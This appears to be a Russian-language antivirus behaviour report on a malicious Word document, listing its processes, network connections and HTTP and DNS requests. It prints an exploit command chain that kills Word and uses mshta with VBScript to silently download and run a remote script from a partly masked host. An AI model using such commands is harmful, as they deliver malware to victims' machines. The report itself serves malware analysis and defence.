Техническая информация
Вредоносные функции
Запускает на исполнение
- '<SYSTEM32>\taskkill.exe' /f /im winword.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C taskkill /f /im winword.exe & mshta vbscript:CreateObject("Wscript.Shell").Run("mshta.exe http://www.bi##y.com/lullimyra3",0,true)(window.close)
Сетевая активность
Подключается к
- 'bi##y.com':80
- 'b6##.#logspot.com':443
- 'fo###.#oogleapis.com':443
- 'bl##ger.com':443
- 'go#####analytics.com':443
- 'fo###.gstatic.com':443
- 'oc##.#tartssl.com':80
TCP
Запросы HTTP GET
- http://www.bi##y.com/lullimyra3
- http://bi##y.com/lullimyra3
- http://oc##.#tartssl.com/sub/class2/code/ca/MEMwQTA%2FMD0wOzAJBgUrDgMCGgUABBQSOgrhRCSnWfKxoWTjWxhk8hga9AQU0E4PQJlsuEsZbzsouODjiAc0qrcCAhAV
Другие
- 'b6##.#logspot.com':443
- 'fo###.#oogleapis.com':443
- 'bl##ger.com':443
- 'go#####analytics.com':443
- 'fo###.gstatic.com':443
UDP
- DNS ASK bi##y.com
- DNS ASK b6##.#logspot.com
- DNS ASK fo###.#oogleapis.com
- DNS ASK bl##ger.com
- DNS ASK go#####analytics.com
- DNS ASK fo###.gstatic.com
- DNS ASK oc##.#tartssl.com
Другое
Ищет следующие окна
- ClassName: '' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
Создает и запускает на исполнение
- '<SYSTEM32>\mshta.exe' http://www.bi##y.com/lullimyra3' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\mshta.exe' vbscript:CreateObject("Wscript.Shell").Run("mshta.exe http://www.bi##y.com/lullimyra3",0,true)(window.close)
- '<SYSTEM32>\mshta.exe' http://www.bi##y.com/lullimyra3
